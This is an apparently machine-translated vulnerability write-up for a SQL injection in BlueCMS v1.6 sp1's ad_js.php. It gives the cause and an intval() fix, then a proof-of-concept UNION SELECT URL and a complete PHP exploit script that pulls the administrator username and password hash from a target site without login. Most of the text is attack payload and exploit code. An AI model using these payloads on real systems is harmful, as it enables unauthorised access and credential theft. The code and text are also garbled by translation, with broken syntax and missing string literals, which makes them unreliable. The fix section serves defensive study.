BlueCMS v1.6 sp1 ad_js.php SQL Injection Vulnerability Analysis

Official introduction:Www.bluecms.net

BlueCMS (dedicated CMS system for local classification information portal)

Developed based on today's most popular open-source combinations of PHP + MYSQL
Title, Keywords, and Description can be separately set for each category to facilitate SEO
Powerful template engine with customizable display styles
Multi-function module plug-in, easy to operate
Intelligent Cache Technology to Improve website performance
Custom multi-attribute models with powerful column Functions

Defect file:Ad_js.php

Vulnerability cause:

12: $ ad_id =! Empty ($ _ GET [ad_id])? Trim ($ _ GET [ad_id]):; // other files in the root directory are well filtered,

Intval () is almost used for numeric variables, but this file is omitted. trim () is used to remove leading and trailing spaces ..

19: $ ad = $ db-> getone ("SELECT * FROM". table (ad). "WHERE ad_id =". $ ad_id); // directly import the data into the query .. Khan.

Repair solution:

$ Ad_id =! Empty ($ _ GET [ad_id])? Intval ($ _ GET [ad_id]):;

Vulnerability Poc:

Http: // localhost/cms/ad_js.php? Ad_id = 1% 20and % 201 = 2% 20 union % 20 select % ,,2, 3,4, 5, concat

(Admin_name, 0x7C0D0A, pwd), concat (admin_name, 0x7C0D0A, pwd) % 20 from % 20blue_admin %

20 where % 20admin_id = 1

Right-click the source code to get the returned data.

Vulnerability Exp:

<? Php
Print_r (
------------------------------------------
BlueCMS v1.6 sp1 "ad_js.php" SQL Injection
Get admin_user pwd-hash without login
By CnCxzSecHttp://hi.baidu.com/cncxz
------------------------------------------
);
If ($ argc <3 ){
Print_r (
------------------------------------------
Usage: php. $ argv [0]. host path
Host: without "http ://"
Path: path to bluecms
Example:
Php. $ argv [0]. localhost/
------------------------------------------
);
Die;
}
$ Host = $ argv [1];
$ Path = $ argv [2];
$ Inj = "/ad_js.php? Ad_id = 1% 20and % 201 = 2% 20 union % 20 select % ,,2, 3,4, 5, concat

(Admin_name, 0x7C0D0A, pwd), concat (admin_name, 0x7C0D0A, pwd) % 20 from % 20blue_admin %

20 where % 20admin_id = 1 ";
Print_r ("[*] exploiting, please wait ...");
$ Fp = fsockopen ($ host, 80, $ errno, $ errstr, 30 );
If (! $ Fp) echo "$ errstr ($ errno) <br/> ";
Else {
$ Head = "GET $ path". "$ inj HTTP/1.1 ";
$ Head. = "Host:". $ host ."";
$ Head. = "Connection: Close ";
$ Result =;
Fputs ($ fp, $ head );
While (! Feof ($ fp )){
$ Result. = fgets ($ fp, 4096 );
}
If (! Eregi ("document", $ result )){

$ Temp = explode ("FROM", $ result );
If (isset ($ temp [1]) {$ temp2 = explode ("ad", $ temp [1]);}
If ($ temp2 [0])
$ Prefix = $ temp2 [0];
Print_r (
[*] Prefix->. $ prefix );
$ Inj = "/ad_js.php? Ad_id = 1% 20and % 201 = 2% 20 union % 20 select % ,,2, 3,4, 5, concat

(Admin_name, 0x7C0D0A, pwd), concat (admin_name, 0x7C0D0A, pwd) % 20 from % 20 ". $ prefix." admin %

20 where % 20admin_id = 1 ";
$ Fp = fsockopen ($ host, 80, $ errno, $ errstr, 30 );
If (! $ Fp) echo "$ errstr ($ errno) <br/> ";
Else {
$ Head = "GET $ path". "$ inj HTTP/1.1 ";
$ Head. = "Host:". $ host ."";
$ Head. = "Connection: Close ";
$ Result =;
Fputs ($ fp, $ head );
While (! Feof ($ fp )){
$ Result. = fgets ($ fp, 4096 );
}
Fclose ($ fp );
$ Rs1 = strstr ($ result ,""");
$ Name = substr ($ rs1, 1, strpos ($ rs1, "|")-1 );
$ Pass = substr ($ rs1, strpos ($ rs1, "|") + 5, 32 );
Print_r (
[*] We get it !);
Print_r (
Username:. $ name );
Print_r (
Pwd-hash:. $ pass );
}
}
Else {
$ Rs1 = strstr ($ result ,""");
$ Name = substr ($ rs1, 1, strpos ($ rs1, "|")-1 );
$ Pass = substr ($ rs1, strpos ($ rs1, "|") + 5, 32 );
Print_r (
[*] We get it !);
Print_r (
Username:. $ name );
Print_r (
Pwd-hash:. $ pass );
}
}
?>